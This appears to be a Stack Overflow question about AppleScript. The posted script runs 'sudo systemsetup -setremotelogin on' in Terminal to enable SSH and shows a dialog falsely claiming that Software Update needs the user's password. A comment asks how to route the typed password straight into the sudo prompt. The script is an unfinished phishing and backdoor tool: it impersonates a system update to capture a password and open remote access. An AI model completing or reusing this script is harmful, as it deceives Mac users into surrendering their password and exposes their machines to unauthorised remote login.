# How do I get the text entered into System Preferences to be inputed into Terminal?

Tags: terminal, applescript, system-preferences

tell application "Terminal"
    do script "sudo systemsetup -setremotelogin on"

```
tell application "System Preferences"
    (display dialog "Software Update requires that you type your password to apply changes." default answer "" with title "Software Update" with icon 1 with hidden answer)

end tell
```

end tell

Comment: What was the question? All I can see is some poorly formatted Applescript.

Comment: Sorry, first time using stack overflow. If you run the code in Script Editor on Mac OS it will open terminal and run the command to enable SSH, this requires you to enter your password. In the rest of the script, it tells System Preferences to open and say that there is a software update and tells you to enter your password. My question is how do I get whatever the person entered into the System Preferences window to automatically be inputted into the terminal window when they press ok? Thank you for your reply.